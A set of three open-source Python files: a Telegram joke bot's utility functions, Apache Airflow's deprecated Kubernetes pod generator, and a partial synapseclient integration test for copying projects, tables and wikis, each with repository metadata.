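# Behaviour sketch (chat id 42 and the call times are illustrative): the first
# call for a chat passes, and later calls are rejected until spamLimitTime (15 s)
# has elapsed since the last *accepted* call, because spamTimestamp is only
# updated on success.
#
#   spamCheck(42, datetime.datetime.now())   # True
#   spamCheck(42, datetime.datetime.now())   # False (inside the 15 s window)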
def atReply():
x = random.randint(0, 5)
if x == 0:
return "haha"
elif x == 1:
return "good, good"
elif x == 2:
return "Don't you have someone else to be bothering?"
elif x == 3:
return "nah"
elif x == 4:
return "lmao"
elif x == 5:
return "shhhhhhhhhhh"
def smashCommand():
x = random.randint(0, 11)
response = ""
if x == 0:
response = "I'M REALLY FEELIN\' IT"
elif x == 1:
response = "SHOW ME YA MOVES"
elif x == 2:
response = "HYES"
elif x == 3:
response = "okey"
elif x == 4:
response = "YOU'RE TOO SLOW"
elif x == 5:
response = "HAIIIIIII~"
elif x == 6:
response = "I fight for my friends."
elif x == 7:
response = "You\'ll get no sympathy from me."
elif x == 8:
response = "TIME TO TIP THE SCALES"
elif x == 9:
response = "*extends hand* C'MON"
elif x == 10:
response = "FIYURRR"
elif x == 11:
response = "WA, WA, WAAAAH"
return response
def screamsCommand():
x = random.randint(0, 3)
response = ""
if x == 0:
response = "AHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHH"
elif x == 1:
response = "UGHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHH"
elif x == 2:
response = "AUGHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHH"
elif x == 3:
response = "?!!?!?!?!?!!!?!!!?!!?!!?!?!?!?!?!?!?!!!!!!???!??!?!?!?!?!??!??!!?!"
return response
def fmk(options):
if len(options) == 1:
x = random.randint(1, 3)
if x == 1:
return "Fuck"
elif x == 2:
return "Marry"
elif x == 3:
return "Kill"
elif len(options) == 3:
x = random.randint(1, 6)
if x == 1:
return "Fuck: " + options[0] + ". Marry: " + options[1] + ". Kill: " + options[2] + "."
elif x == 2:
return "Fuck: " + options[0] + ". Marry: " + options[2] + ". Kill: " + options[1] + "."
elif x == 3:
return "Fuck: " + options[1] + ". Marry: " + options[0] + ". Kill: " + options[2] + "."
elif x == 4:
return "Fuck: " + options[1] + ". Marry: " + options[2] + ". Kill: " + options[0] + "."
elif x == 5:
return "Fuck: " + options[2] + ". Marry: " + options[1] + ". Kill: " + options[0] + "."
elif x == 6:
return "Fuck: " + options[2] + ". Marry: " + options[0] + ". Kill: " + options[1] + "."
else:
return "Usage: /fmk Name or /fmk Name Name Name"
def snailResponse(messageText):
try:
result = ""
for modifyingWord in re.split(r'[@\s*]', messageText.lower()):
if modifyingWord != "/snail":
result += "sn" + modifyingWord[first_vowel(modifyingWord):] + " "
return result
except Exception:
return "Usage: /snail word - NO WEIRD CHARACTERS."
def objectionResponse(currentMessage):
try:
if currentMessage.reply_to_message.from_user.first_name.lower() == "adamtestbot":
return "Objecting to me, " + currentMessage.from_user.first_name + "? Overruled."
else:
return currentMessage.from_user.first_name.upper() + " OBJECTS TO WHAT " + currentMessage.reply_to_message.from_user.first_name.upper() + " SAID HERE!"
except Exception: #reply_to_message didn't exist
return "Object to messages by replying to them with /objection."
def ageCommand(instanceAge):
weeks = int(instanceAge / (3600 * 24 * 7))
days = int((instanceAge - (weeks * 3600 * 24 * 7)) / (3600 * 24))
hours = int((instanceAge - (weeks * 3600 * 24 * 7) - (days * (3600 * 24))) / 3600)
minutes = int((instanceAge - (weeks * 3600 * 24 * 7) - (days * (3600 * 24)) - (hours * 3600)) / 60)
seconds = int((instanceAge % 60))
stringWeeks = str(weeks) + "w"
stringDays = str(days) + "d"
stringHours = ""
if hours < 10:
stringHours = "0" + str(hours)
else:
stringHours = str(hours)
stringHours += "h"
stringMinutes = ""
if minutes < 10:
stringMinutes = "0" + str(minutes)
else:
stringMinutes = str(minutes)
stringMinutes += "m"
stringSeconds = ""
if seconds < 10:
stringSeconds = "0" + str(seconds)
else:
stringSeconds = str(seconds)
stringSeconds += "s"
stringDisplay = ""
if weeks > 0:
stringDisplay += stringWeeks + stringDays + stringHours + stringMinutes + stringSeconds
elif days > 0:
stringDisplay += stringDays + stringHours + stringMinutes + stringSeconds
elif hours > 0:
stringDisplay += stringHours + stringMinutes + stringSeconds
elif minutes > 0:
stringDisplay += stringMinutes + stringSeconds
else:
stringDisplay += stringSeconds
return stringDisplay
def eightBall():
x = random.randint(0, 15)
if x == 0:
return telegram.emoji.Emoji.FISTED_HAND_SIGN + telegram.emoji.Emoji.SPLASHING_SWEAT_SYMBOL
elif x == 1:
return telegram.emoji.Emoji.POUTING_FACE
elif x == 2:
return telegram.emoji.Emoji.THUMBS_UP_SIGN
elif x == 3:
return telegram.emoji.Emoji.SMILING_FACE_WITH_HEART_SHAPED_EYES
elif x == 4:
return telegram.emoji.Emoji.DISAPPOINTED_FACE
elif x == 5:
return telegram.emoji.Emoji.UNAMUSED_FACE
elif x == 6:
return telegram.emoji.Emoji.WEARY_FACE
elif x == 7:
return telegram.emoji.Emoji.FIRE + telegram.emoji.Emoji.WEARY_FACE + telegram.emoji.Emoji.FIRE
elif x == 8:
return telegram.emoji.Emoji.PISTOL + telegram.emoji.Emoji.FEARFUL_FACE
elif x == 9:
return telegram.emoji.Emoji.SMILING_FACE_WITH_OPEN_MOUTH_AND_COLD_SWEAT
elif x == 10:
return telegram.emoji.Emoji.HEART_DECORATION
elif x == 11:
return telegram.emoji.Emoji.THUMBS_DOWN_SIGN
elif x == 12:
return telegram.emoji.Emoji.CRYING_FACE
elif x == 13:
return telegram.emoji.Emoji.SMILING_FACE
elif x == 14:
return telegram.emoji.Emoji.FEARFUL_FACE
elif x == 15:
return telegram.emoji.Emoji.SMIRKING_FACE
def isMoom(parsedCommand):
try:
i = 1
if parsedCommand.lower()[0] == "/" and parsedCommand.lower()[i] == "m":
i += 1
while parsedCommand.lower()[i] == "o":
i += 1
if parsedCommand.lower()[i] == "m" and i + 1 == len(parsedCommand) and i > 3:
return True
else:
return False
else:
return False
except Exception:
return False
def fightResponse(currentMessage):
response = ""
fightingMe = False
try:
response = "OH FUCK, " + currentMessage.from_user.first_name.upper() + " WANTS TO FIGHT " + currentMessage.reply_to_message.from_user.first_name.upper() + "!"
fightingMe = currentMessage.reply_to_message.from_user.first_name.lower() == "adamtestbot"
except Exception:
try:
if len(currentMessage.text) <= len("/fight "):
raise Exception
response = "OH SHIT, " + currentMessage.from_user.first_name.upper() + " WANTS TO FIGHT " + currentMessage.text[len("/fight "):].upper() + "!"
fightingMe = currentMessage.text[len("/fight "):].lower() == "adamtestbot" or currentMessage.text[len("/fight "):].lower() == "@adamtestbot"
except Exception:
fightingMe = True
if fightingMe:
response = "You wanna fight ME, " + currentMessage.from_user.first_name + "??"
return response
def summonResponse(currentMessage):
response = ""
summoningMe = False
try:
response = currentMessage.from_user.first_name + " is summoning " + currentMessage.reply_to_message.from_user.first_name + "!"
summoningMe = currentMessage.reply_to_message.from_user.first_name.lower() == "adamtestbot"
except Exception:
try:
if len(currentMessage.text) <= len("/summon "):
raise Exception
response = currentMessage.from_user.first_name + " is summoning " + currentMessage.text[len("/summon "):] + "!"
summoningMe = currentMessage.text[len("/summon "):].lower() == "adamtestbot" or currentMessage.text[len("/summon "):].lower() == "@adamtestbot"
except Exception:
summoningMe = True
if summoningMe:
response = "I\'m already here, " + currentMessage.from_user.first_name + "."
return response
def pickResponse(messageText):
wholeTextArray = re.split(r'[@\s*]', messageText[len("/pick "):])
if len(messageText) <= len("/pick "):
return "Usage: /pick Name Name Name"
else:
answerIndex = random.randint(0, len(wholeTextArray) - 1)
return wholeTextArray[answerIndex]
def blaze(currentMessage):
checkingStats = False
try:
if currentMessage.text.lower().split()[1] == "stats":
#db = Base('chatStorage/blaze.pdl') #The path to the database
#db.create('username', 'name', 'counter', 'timestamp', mode="open") #Create a new DB if one doesn't exist. If it does, open it
outputString = "JOINTS BLAZED:\n"
K = list()
for user in builtins.blazeDB:
K.append(user)
sortedK = sorted(K, key=lambda x: int(x['counter']), reverse=True)
for user in sortedK:
pluralString = " JOINT"
if not(int(user["counter"]) == 1):
pluralString += "S"
pluralString += "\n"
if int(user['timestamp']) + (24 * 3600) - 60 > time.mktime(currentMessage.date.timetuple()):
outputString += "*"
outputString += user["name"].upper() + ": " + str(user["counter"]) + pluralString
return outputString
checkingStats = True
except IndexError:
pass
start = datetime.time(4, 20)
end = datetime.time(4, 20)
time_received = currentMessage.date
print(start)
print(time_received)
start2 = datetime.time(16, 20)
end2 = datetime.time(16, 20)
if start <= datetime.time(time_received.hour, time_received.minute) <= end: #4:20 AM
if not checkingStats:
return currentMessage.from_user.first_name + ", I know you like staying up late, but you really need to puff puff pass out."
elif (start2 <= datetime.time(time_received.hour, time_received.minute) <= end2) and not checkingStats:
pointsReceived = 4 - int(time_received.second / 15)
print("DEBUG TIME: PointsReceived=" + str(pointsReceived))
#db = Base('chatStorage/blaze.pdl') #The path to the database
#db.create('username', 'name', 'counter', 'timestamp', mode="open") #Create a new DB if one doesn't exist. If it does, open it
userWasFound = False
valueSuccessfullyChanged = False
userPoints = 0
for user in builtins.blazeDB:
# print user['username']
if int(user['username']) == currentMessage.from_user.id:
if time.mktime(currentMessage.date.timetuple()) - 60 > int(user['timestamp']):
builtins.blazeDB.update(user, counter=int(user['counter']) + pointsReceived)
userPoints = user['counter']
builtins.blazeDB.update(user, timestamp=int(time.mktime(currentMessage.date.timetuple())))
valueSuccessfullyChanged = True
print("Found user!\n")
userWasFound = True
if not userWasFound:
builtins.blazeDB.insert(currentMessage.from_user.id, currentMessage.from_user.first_name, pointsReceived, int(time.mktime(currentMessage.date.timetuple())))
userPoints = pointsReceived
if valueSuccessfullyChanged or not userWasFound:
pluralString = " JOINT"
if pointsReceived > 1:
pluralString = pluralString + "S"
#db.commit() #Write the in memory DB changes to disk
return currentMessage.from_user.first_name.upper() + " 420 BLAZED IT AT " + str(time_received.second).upper() + " SECONDS. THEY BLAZED " + str(pointsReceived) + pluralString + " AND HAVE NOW SMOKED " + str(userPoints) + " IN TOTAL."
else:
return currentMessage.from_user.first_name + " is getting a bit too eager to blaze it."
else:
if not checkingStats:
return currentMessage.from_user.first_name + " failed to blaze."
def first_vowel(s):
if s[0].lower() != "y":
i = re.search("[aeiouy]", s, re.IGNORECASE)
else:
i = re.search("[aeiou]", s, re.IGNORECASE)
return 0 if i is None else i.start()
def log(user_id, currentMessage):
try:
K = list()
logExists = os.path.exists('../log/' + str(user_id * -1) + 'log.csv')
fieldnames = ['name', 'text']
if logExists:
try:
with open('../log/' + str(user_id * -1) + 'log.csv', 'r+') as csvfile:
reader = csv.DictReader(csvfile)
K = list(reader)
with open('../log/' + str(user_id * -1) + 'log.csv', 'w+') as csvfile:
writer = csv.DictWriter(csvfile, fieldnames=fieldnames)
writer.writeheader()
for x in K:
writer.writerow(x)
writer.writerow({'name': currentMessage.from_user.first_name, 'text': currentMessage.text})
except Exception:
pass
else:
      open('../log/' + str(user_id * -1) + 'log.csv', 'a').close()  # create the log file if it does not exist yet
with open('../log/' + str(user_id * -1) + 'log.csv', 'w+') as csvfile:
writer = csv.DictWriter(csvfile, fieldnames=fieldnames)
writer.writeheader()
writer.writerow({'name': currentMessage.from_user.first_name, 'text': currentMessage.text})
except Exception:
    print(traceback.format_exc())
| {
"content_hash": "ffefa544a561add9dd7efe990e96e3c5",
"timestamp": "",
"source": "github",
"line_count": 435,
"max_line_length": 244,
"avg_line_length": 40.53793103448276,
"alnum_prop": 0.5940229102869456,
"repo_name": "magomez96/AdamTestBot",
"id": "0888d49eda8d661ba831c8384cf0ec7cda7704ab",
"size": "17634",
"binary": false,
"copies": "1",
"ref": "refs/heads/ATB-3.0",
"path": "src/atbMiscFunctions.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "50"
},
{
"name": "Python",
"bytes": "1115187"
},
{
"name": "Shell",
"bytes": "309"
}
],
"symlink_target": ""
} |
"""
This module provides an interface between the previous Pod
API and outputs a kubernetes.client.models.V1Pod.
The advantage being that the full Kubernetes API
is supported and no serialization need be written.
"""
from __future__ import annotations
import copy
import hashlib
import re
import uuid
from kubernetes.client import models as k8s
MAX_POD_ID_LEN = 253
MAX_LABEL_LEN = 63
class PodDefaults:
"""Static defaults for Pods"""
XCOM_MOUNT_PATH = "/airflow/xcom"
SIDECAR_CONTAINER_NAME = "airflow-xcom-sidecar"
XCOM_CMD = 'trap "exit 0" INT; while true; do sleep 30; done;'
VOLUME_MOUNT = k8s.V1VolumeMount(name="xcom", mount_path=XCOM_MOUNT_PATH)
VOLUME = k8s.V1Volume(name="xcom", empty_dir=k8s.V1EmptyDirVolumeSource())
SIDECAR_CONTAINER = k8s.V1Container(
name=SIDECAR_CONTAINER_NAME,
command=["sh", "-c", XCOM_CMD],
image="alpine",
volume_mounts=[VOLUME_MOUNT],
resources=k8s.V1ResourceRequirements(
requests={
"cpu": "1m",
}
),
)
def make_safe_label_value(string):
"""
Valid label values must be 63 characters or less and must be empty or begin and
end with an alphanumeric character ([a-z0-9A-Z]) with dashes (-), underscores (_),
dots (.), and alphanumerics between.
If the label value is greater than 63 chars once made safe, or differs in any
way from the original value sent to this function, then we need to truncate to
53 chars, and append it with a unique hash.
"""
safe_label = re.sub(r"^[^a-z0-9A-Z]*|[^a-zA-Z0-9_\-\.]|[^a-z0-9A-Z]*$", "", string)
if len(safe_label) > MAX_LABEL_LEN or string != safe_label:
safe_hash = hashlib.md5(string.encode()).hexdigest()[:9]
safe_label = safe_label[: MAX_LABEL_LEN - len(safe_hash) - 1] + "-" + safe_hash
return safe_label
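# Illustrative sketch, not part of the original module: example inputs and the
# expected shape of make_safe_label_value() output. The concrete hash suffix
# below is an assumption -- the real one is the first 9 hex chars of the MD5 of
# the original string.
#   make_safe_label_value("my-dag")    -> "my-dag"           (already valid, unchanged)
#   make_safe_label_value("my dag!")   -> "mydag-<md5[:9]>"  (sanitized, truncated to 53
#                                                             chars, hash appended)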
class PodGenerator:
"""
Contains Kubernetes Airflow Worker configuration logic
Represents a kubernetes pod and manages execution of a single pod.
Any configuration that is container specific gets applied to
the first container in the list of containers.
:param image: The docker image
:param name: name in the metadata section (not the container name)
:param namespace: pod namespace
:param volume_mounts: list of kubernetes volumes mounts
:param envs: A dict containing the environment variables
:param cmds: The command to be run on the first container
:param args: The arguments to be run on the pod
:param labels: labels for the pod metadata
:param node_selectors: node selectors for the pod
:param ports: list of ports. Applies to the first container.
:param volumes: Volumes to be attached to the first container
:param image_pull_policy: Specify a policy to cache or always pull an image
:param restart_policy: The restart policy of the pod
:param image_pull_secrets: Any image pull secrets to be given to the pod.
If more than one secret is required, provide a comma separated list:
secret_a,secret_b
:param init_containers: A list of init containers
:param service_account_name: Identity for processes that run in a Pod
:param resources: Resource requirements for the first containers
:param annotations: annotations for the pod
:param affinity: A dict containing a group of affinity scheduling rules
:param hostnetwork: If True enable host networking on the pod
:param tolerations: A list of kubernetes tolerations
:param security_context: A dict containing the security context for the pod
:param configmaps: Any configmap refs to envfrom.
If more than one configmap is required, provide a comma separated list
configmap_a,configmap_b
:param dnspolicy: Specify a dnspolicy for the pod
:param schedulername: Specify a schedulername for the pod
:param pod: The fully specified pod. Mutually exclusive with `path_or_string`
:param extract_xcom: Whether to bring up a container for xcom
:param priority_class_name: priority class name for the launched Pod
"""
def __init__(
self,
image: str | None = None,
name: str | None = None,
namespace: str | None = None,
volume_mounts: list[k8s.V1VolumeMount | dict] | None = None,
envs: dict[str, str] | None = None,
cmds: list[str] | None = None,
args: list[str] | None = None,
labels: dict[str, str] | None = None,
node_selectors: dict[str, str] | None = None,
ports: list[k8s.V1ContainerPort | dict] | None = None,
volumes: list[k8s.V1Volume | dict] | None = None,
image_pull_policy: str | None = None,
restart_policy: str | None = None,
image_pull_secrets: str | None = None,
init_containers: list[k8s.V1Container] | None = None,
service_account_name: str | None = None,
resources: k8s.V1ResourceRequirements | dict | None = None,
annotations: dict[str, str] | None = None,
affinity: dict | None = None,
hostnetwork: bool = False,
tolerations: list | None = None,
security_context: k8s.V1PodSecurityContext | dict | None = None,
configmaps: list[str] | None = None,
dnspolicy: str | None = None,
schedulername: str | None = None,
extract_xcom: bool = False,
priority_class_name: str | None = None,
):
self.pod = k8s.V1Pod()
self.pod.api_version = "v1"
self.pod.kind = "Pod"
# Pod Metadata
self.metadata = k8s.V1ObjectMeta()
self.metadata.labels = labels
self.metadata.name = name
self.metadata.namespace = namespace
self.metadata.annotations = annotations
# Pod Container
self.container = k8s.V1Container(name="base")
self.container.image = image
self.container.env = []
if envs:
if isinstance(envs, dict):
for key, val in envs.items():
self.container.env.append(k8s.V1EnvVar(name=key, value=val))
elif isinstance(envs, list):
self.container.env.extend(envs)
configmaps = configmaps or []
self.container.env_from = []
for configmap in configmaps:
self.container.env_from.append(
k8s.V1EnvFromSource(config_map_ref=k8s.V1ConfigMapEnvSource(name=configmap))
)
self.container.command = cmds or []
self.container.args = args or []
if image_pull_policy:
self.container.image_pull_policy = image_pull_policy
self.container.ports = ports or []
self.container.resources = resources
self.container.volume_mounts = volume_mounts or []
# Pod Spec
self.spec = k8s.V1PodSpec(containers=[])
self.spec.security_context = security_context
self.spec.tolerations = tolerations
if dnspolicy:
self.spec.dns_policy = dnspolicy
self.spec.scheduler_name = schedulername
self.spec.host_network = hostnetwork
self.spec.affinity = affinity
self.spec.service_account_name = service_account_name
self.spec.init_containers = init_containers
self.spec.volumes = volumes or []
self.spec.node_selector = node_selectors
if restart_policy:
self.spec.restart_policy = restart_policy
self.spec.priority_class_name = priority_class_name
self.spec.image_pull_secrets = []
if image_pull_secrets:
for image_pull_secret in image_pull_secrets.split(","):
self.spec.image_pull_secrets.append(k8s.V1LocalObjectReference(name=image_pull_secret))
# Attach sidecar
self.extract_xcom = extract_xcom
def gen_pod(self) -> k8s.V1Pod:
"""Generates pod"""
        result = self.pod
result.spec = self.spec
result.metadata = self.metadata
result.spec.containers = [self.container]
result.metadata.name = self.make_unique_pod_id(result.metadata.name)
if self.extract_xcom:
result = self.add_sidecar(result)
return result
@staticmethod
def add_sidecar(pod: k8s.V1Pod) -> k8s.V1Pod:
"""Adds sidecar"""
pod_cp = copy.deepcopy(pod)
pod_cp.spec.volumes = pod.spec.volumes or []
pod_cp.spec.volumes.insert(0, PodDefaults.VOLUME)
pod_cp.spec.containers[0].volume_mounts = pod_cp.spec.containers[0].volume_mounts or []
pod_cp.spec.containers[0].volume_mounts.insert(0, PodDefaults.VOLUME_MOUNT)
pod_cp.spec.containers.append(PodDefaults.SIDECAR_CONTAINER)
return pod_cp
@staticmethod
def from_obj(obj) -> k8s.V1Pod | None:
"""Converts to pod from obj"""
if obj is None:
return None
if isinstance(obj, PodGenerator):
return obj.gen_pod()
if not isinstance(obj, dict):
raise TypeError(
"Cannot convert a non-dictionary or non-PodGenerator "
"object into a KubernetesExecutorConfig"
)
# We do not want to extract constant here from ExecutorLoader because it is just
# A name in dictionary rather than executor selection mechanism and it causes cyclic import
namespaced = obj.get("KubernetesExecutor", {})
if not namespaced:
return None
resources = namespaced.get("resources")
if resources is None:
requests = {
"cpu": namespaced.get("request_cpu"),
"memory": namespaced.get("request_memory"),
"ephemeral-storage": namespaced.get("ephemeral-storage"),
}
limits = {
"cpu": namespaced.get("limit_cpu"),
"memory": namespaced.get("limit_memory"),
"ephemeral-storage": namespaced.get("ephemeral-storage"),
}
all_resources = list(requests.values()) + list(limits.values())
if all(r is None for r in all_resources):
resources = None
else:
resources = k8s.V1ResourceRequirements(requests=requests, limits=limits)
namespaced["resources"] = resources
return PodGenerator(**namespaced).gen_pod()
@staticmethod
def make_unique_pod_id(dag_id):
r"""
Kubernetes pod names must be <= 253 chars and must pass the following regex for
validation
``^[a-z0-9]([-a-z0-9]*[a-z0-9])?(\\.[a-z0-9]([-a-z0-9]*[a-z0-9])?)*$``
:param dag_id: a dag_id with only alphanumeric characters
:return: ``str`` valid Pod name of appropriate length
"""
if not dag_id:
return None
safe_uuid = uuid.uuid4().hex
safe_pod_id = dag_id[: MAX_POD_ID_LEN - len(safe_uuid) - 1] + "-" + safe_uuid
return safe_pod_id
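# Minimal usage sketch (illustrative only, not part of the original module; the
# image, name and env values below are assumptions):
#   pod = PodGenerator(
#       image="python:3.8-slim",
#       name="example-task",
#       namespace="default",
#       envs={"FOO": "bar"},
#       cmds=["python", "-c", "print('hello')"],
#   ).gen_pod()
#   # gen_pod() runs the metadata name through make_unique_pod_id(), so the
#   # resulting pod is named "example-task-<32-hex-uuid>" and stays within the
#   # 253-character limit.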
| {
"content_hash": "1b0d07daedeeead6d48ce5adfc3a05d4",
"timestamp": "",
"source": "github",
"line_count": 286,
"max_line_length": 103,
"avg_line_length": 38.44405594405595,
"alnum_prop": 0.6277398817644384,
"repo_name": "apache/airflow",
"id": "f08a6c45d223199f8aaeb7d68f82bca55853c6f6",
"size": "11780",
"binary": false,
"copies": "2",
"ref": "refs/heads/main",
"path": "airflow/kubernetes/pod_generator_deprecated.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "25980"
},
{
"name": "Dockerfile",
"bytes": "71458"
},
{
"name": "HCL",
"bytes": "3786"
},
{
"name": "HTML",
"bytes": "172957"
},
{
"name": "JavaScript",
"bytes": "143915"
},
{
"name": "Jinja",
"bytes": "38911"
},
{
"name": "Jupyter Notebook",
"bytes": "5482"
},
{
"name": "Mako",
"bytes": "1339"
},
{
"name": "Python",
"bytes": "23697738"
},
{
"name": "R",
"bytes": "313"
},
{
"name": "Shell",
"bytes": "211306"
},
{
"name": "TypeScript",
"bytes": "521019"
}
],
"symlink_target": ""
} |
import uuid
import time
import re
import json
import pytest
from synapseclient.core.exceptions import SynapseHTTPError
from synapseclient import Activity, Annotations, Column, File, Folder, Link, Project, Row, RowSet, Schema, Wiki
import synapseclient.core.utils as utils
import synapseutils
# Add Test for UPDATE
# Add test for existing provenance but the orig doesn't have provenance
def test_copy(syn, schedule_for_cleanup):
"""Tests the copy function"""
# Create a Project
project_entity = syn.store(Project(name=str(uuid.uuid4())))
schedule_for_cleanup(project_entity.id)
# Create two Folders in Project
folder_entity = syn.store(Folder(name=str(uuid.uuid4()), parent=project_entity))
second_folder = syn.store(Folder(name=str(uuid.uuid4()), parent=project_entity))
third_folder = syn.store(Folder(name=str(uuid.uuid4()), parent=project_entity))
schedule_for_cleanup(folder_entity.id)
schedule_for_cleanup(second_folder.id)
schedule_for_cleanup(third_folder.id)
# Annotations and provenance
repo_url = 'https://github.com/Sage-Bionetworks/synapsePythonClient'
annos = {'test': ['hello_world']}
prov = Activity(name="test", used=repo_url)
# Create, upload, and set annotations/provenance on a file in Folder
filename = utils.make_bogus_data_file()
schedule_for_cleanup(filename)
file_entity = syn.store(File(filename, parent=folder_entity))
externalURL_entity = syn.store(File(repo_url, name='rand', parent=folder_entity, synapseStore=False))
syn.set_annotations(Annotations(file_entity, file_entity.etag, annos))
syn.set_annotations(Annotations(externalURL_entity, externalURL_entity.etag, annos))
syn.setProvenance(externalURL_entity.id, prov)
schedule_for_cleanup(file_entity.id)
schedule_for_cleanup(externalURL_entity.id)
# ------------------------------------
# TEST COPY FILE
# ------------------------------------
output = synapseutils.copy(syn, file_entity.id, destinationId=project_entity.id)
output_URL = synapseutils.copy(syn, externalURL_entity.id, destinationId=project_entity.id,
skipCopyAnnotations=True)
# Verify that our copied files are identical
copied_ent = syn.get(output[file_entity.id])
copied_URL_ent = syn.get(output_URL[externalURL_entity.id], downloadFile=False)
copied_ent_annot = syn.get_annotations(copied_ent)
copied_url_annot = syn.get_annotations(copied_URL_ent)
copied_prov = syn.getProvenance(copied_ent)
copied_url_prov = syn.getProvenance(copied_URL_ent)
schedule_for_cleanup(copied_ent.id)
schedule_for_cleanup(copied_URL_ent.id)
# TEST: set_Provenance = Traceback
assert copied_prov['used'][0]['reference']['targetId'] == file_entity.id
assert copied_url_prov['used'][0]['reference']['targetId'] == externalURL_entity.id
# TEST: Make sure copied files are the same
assert copied_ent_annot == annos
assert copied_ent.dataFileHandleId == file_entity.dataFileHandleId
# TEST: Make sure copied URLs are the same
assert copied_url_annot == {}
assert copied_URL_ent.externalURL == repo_url
assert copied_URL_ent.name == 'rand'
assert copied_URL_ent.dataFileHandleId == externalURL_entity.dataFileHandleId
# TEST: Throw error if file is copied to a folder/project that has a file with the same filename
pytest.raises(ValueError, synapseutils.copy, syn, project_entity.id, destinationId=project_entity.id)
pytest.raises(ValueError, synapseutils.copy, syn, file_entity.id, destinationId=project_entity.id)
pytest.raises(ValueError, synapseutils.copy, syn, file_entity.id, destinationId=third_folder.id,
setProvenance="gib")
pytest.raises(ValueError, synapseutils.copy, syn, file_entity.id, destinationId=file_entity.id)
# Test: setProvenance = None
output = synapseutils.copy(syn, file_entity.id, destinationId=second_folder.id, setProvenance=None)
pytest.raises(SynapseHTTPError, syn.getProvenance, output[file_entity.id])
schedule_for_cleanup(output[file_entity.id])
# Test: setProvenance = Existing
output_URL = synapseutils.copy(syn, externalURL_entity.id, destinationId=second_folder.id, setProvenance="existing")
output_prov = syn.getProvenance(output_URL[externalURL_entity.id])
schedule_for_cleanup(output_URL[externalURL_entity.id])
assert output_prov['name'] == prov['name']
assert output_prov['used'] == prov['used']
# ------------------------------------
# TEST COPY LINKS
# ------------------------------------
second_file = utils.make_bogus_data_file()
# schedule_for_cleanup(filename)
second_file_entity = syn.store(File(second_file, parent=project_entity))
link_entity = Link(second_file_entity.id, parent=folder_entity.id)
link_entity = syn.store(link_entity)
copied_link = synapseutils.copy(syn, link_entity.id, destinationId=second_folder.id)
old = syn.get(link_entity.id, followLink=False)
new = syn.get(copied_link[link_entity.id], followLink=False)
assert old.linksTo['targetId'] == new.linksTo['targetId']
schedule_for_cleanup(second_file_entity.id)
schedule_for_cleanup(link_entity.id)
schedule_for_cleanup(copied_link[link_entity.id])
time.sleep(3)
pytest.raises(ValueError, synapseutils.copy, syn, link_entity.id, destinationId=second_folder.id)
# ------------------------------------
# TEST COPY TABLE
# ------------------------------------
second_project = syn.store(Project(name=str(uuid.uuid4())))
schedule_for_cleanup(second_project.id)
cols = [Column(name='n', columnType='DOUBLE', maximumSize=50),
Column(name='c', columnType='STRING', maximumSize=50),
Column(name='i', columnType='INTEGER')]
data = [[2.1, 'foo', 10],
[2.2, 'bar', 20],
[2.3, 'baz', 30]]
schema = syn.store(Schema(name='Testing', columns=cols, parent=project_entity.id))
syn.store(RowSet(schema=schema, rows=[Row(r) for r in data]))
table_map = synapseutils.copy(syn, schema.id, destinationId=second_project.id)
copied_table = syn.tableQuery('select * from %s' % table_map[schema.id])
rows = copied_table.asRowSet()['rows']
# TEST: Check if all values are the same
for i, row in enumerate(rows):
assert row['values'] == data[i]
pytest.raises(ValueError, synapseutils.copy, syn, schema.id, destinationId=second_project.id)
schedule_for_cleanup(schema.id)
schedule_for_cleanup(table_map[schema.id])
# ------------------------------------
# TEST COPY FOLDER
# ------------------------------------
mapping = synapseutils.copy(syn, folder_entity.id, destinationId=second_project.id)
for i in mapping:
old = syn.get(i, downloadFile=False)
new = syn.get(mapping[i], downloadFile=False)
assert old.name == new.name
assert old.annotations == new.annotations
assert old.concreteType == new.concreteType
pytest.raises(ValueError, synapseutils.copy, syn, folder_entity.id, destinationId=second_project.id)
# TEST: Throw error if excludeTypes isn't in file, link and table or isn't a list
pytest.raises(ValueError, synapseutils.copy, syn, second_folder.id, destinationId=second_project.id,
excludeTypes=["foo"])
pytest.raises(ValueError, synapseutils.copy, syn, second_folder.id, destinationId=second_project.id,
excludeTypes="file")
# TEST: excludeType = ["file"], only the folder is created
second = synapseutils.copy(syn, second_folder.id, destinationId=second_project.id,
excludeTypes=["file", "table", "link"])
copied_folder = syn.get(second[second_folder.id])
assert copied_folder.name == second_folder.name
assert len(second) == 1
# TEST: Make sure error is thrown if foldername already exists
pytest.raises(ValueError, synapseutils.copy, syn, second_folder.id, destinationId=second_project.id)
# ------------------------------------
# TEST COPY PROJECT
# ------------------------------------
third_project = syn.store(Project(name=str(uuid.uuid4())))
schedule_for_cleanup(third_project.id)
mapping = synapseutils.copy(syn, project_entity.id, destinationId=third_project.id)
for i in mapping:
old = syn.get(i, downloadFile=False)
new = syn.get(mapping[i], downloadFile=False)
if not isinstance(old, Project):
assert old.name == new.name
assert old.annotations == new.annotations
assert old.concreteType == new.concreteType
# TEST: Can't copy project to a folder
pytest.raises(ValueError, synapseutils.copy, syn, project_entity.id, destinationId=second_folder.id)
class TestCopyWiki:
@pytest.fixture(autouse=True)
def init(self, syn, schedule_for_cleanup):
self.syn = syn
self.schedule_for_cleanup = schedule_for_cleanup
# Create a Project
self.project_entity = syn.store(Project(name=str(uuid.uuid4())))
filename = utils.make_bogus_data_file()
attachname = utils.make_bogus_data_file()
file_entity = self.syn.store(File(filename, parent=self.project_entity))
self.schedule_for_cleanup(self.project_entity.id)
self.schedule_for_cleanup(filename)
self.schedule_for_cleanup(file_entity.id)
# Create mock wiki
md = """
This is a test wiki
=======================
Blabber jabber blah blah boo.
syn123
syn456
"""
wiki = Wiki(owner=self.project_entity, title='A Test Wiki', markdown=md,
attachments=[attachname])
wiki = self.syn.store(wiki)
# Create a Wiki sub-page
subwiki = Wiki(owner=self.project_entity, title='A sub-wiki',
markdown='%s' % file_entity.id, parentWikiId=wiki.id)
self.subwiki = self.syn.store(subwiki)
second_md = """
Testing internal links
======================
[test](#!Synapse:%s/wiki/%s)
%s)
""" % (self.project_entity.id, self.subwiki.id, file_entity.id)
